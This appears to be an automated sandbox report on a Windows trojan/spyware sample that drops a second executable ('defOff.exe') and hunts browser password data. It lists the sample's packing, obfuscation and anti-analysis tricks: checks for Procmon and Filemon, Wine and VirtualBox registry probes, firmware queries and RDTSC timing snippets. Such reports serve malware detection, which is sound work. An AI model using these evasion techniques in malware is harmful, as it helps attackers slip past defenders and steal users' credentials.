Source: file.exe, 00000000.00000003.1688661921.00000000058D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693684610.0000000005C01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1722535596.0000000000E05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697370945.0000000005C80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1698403476.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1698080559.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1705919779.0000000005BBE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694875574.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697152878.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695089299.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696603439.0000000005A75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694981586.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1686352837.00000000056F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1691981707.0000000005B19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697761164.0000000005C88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696714952.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1699721895.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693513581.0000000005A75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695420232.0000000005B5D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1703019820.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1705627346.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1722423346.00000000056A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000002.1724653610.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695305143.0000000005A73000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697058021.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1699002147.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1705777213.0000000005A75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9980101391065831
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.1517655343.00000000055D8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1533482778.0000000005675000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1517260814.00000000055F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe "C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe "C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: sspicli.dll Jump to behavior
Source: file.exe Static file information: File size 2958336 > 1048576
Source: file.exe Static PE information: Raw size of jmvediaj is bigger than: 0x100000 < 0x2a6e00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000003.1733973050.0000000004B70000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.870000.0.unpack :EW;.rsrc :W;.idata :W;jmvediaj:EW;famfwksn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;jmvediaj:EW;famfwksn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Unpacked PE file: 3.2.94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.550000.0.unpack :EW;.rsrc:W;.idata :W;aisygwgx:EW;pdrbgaqy:EW;.taggant:EW; vs :ER;.rsrc:W;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x2d3a6d should be: 0x2d3c97
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: real checksum: 0x2c54ab should be: 0x2bcb13
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: jmvediaj
Source: file.exe Static PE information: section name: famfwksn
Source: file.exe Static PE information: section name: .taggant
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name:
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: .idata
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: aisygwgx
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: pdrbgaqy
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D8CF4C push esp; iretd 0_3_00D8CF59
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D8548A pushfd ; retf 0_3_00D85499
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DABE90 pushad ; ret 0_3_00DABE95
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DEEC9D push ebx; retf 0_3_00DEECA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DEEC9D push ebx; retf 0_3_00DEECA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DFCEB3 push ebx; iretd 0_3_00DFCEB5
Source: file.exe Static PE information: section name: entropy: 7.977471992304813
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: entropy: 7.776956795829379
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: Regmonclass Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF316 second address: 8CF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF321 second address: 8CF327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF327 second address: 8CF32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF32B second address: 8CF32F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CEC37 second address: 8CEC3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A47DA9 second address: A47DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CEh 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FDE8CE8B4C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48070 second address: A4807F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4807F second address: A48095 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8CE8B4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007FDE8CE8B4C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48095 second address: A48099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4831C second address: A48320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48320 second address: A48342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E2h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FDE8C51D4D6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4848E second address: A48494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48494 second address: A4849F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B6F5 second address: A4B763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8CE8B4C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FDE8CE8B4CDh 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 sub dword ptr [ebp+122D1C44h], edx 0x0000001e mov edi, dword ptr [ebp+122D2E7Fh] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FDE8CE8B4C8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 jng 00007FDE8CE8B4D0h 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D29FFh], eax 0x0000004f popad 0x00000050 push 44AD8AD5h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pushad 0x00000059 popad 0x0000005a pop edi 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B763 second address: A4B7E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FDE8C51D4D6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 44AD8A55h 0x00000013 mov ch, al 0x00000015 mov dx, B259h 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FDE8C51D4D8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 push ebx 0x00000036 mov esi, 60F63800h 0x0000003b pop edx 0x0000003c mov dword ptr [ebp+122D29FFh], esi 0x00000042 push 00000000h 0x00000044 movzx edi, si 0x00000047 push 00000003h 0x00000049 call 00007FDE8C51D4DEh 0x0000004e mov si, 0CE2h 0x00000052 pop edx 0x00000053 or dword ptr [ebp+122D1CE0h], edx 0x00000059 push 85473414h 0x0000005e push eax 0x0000005f push edx 0x00000060 push edx 0x00000061 jmp 00007FDE8C51D4DEh 0x00000066 pop edx 0x00000067 rdtsc
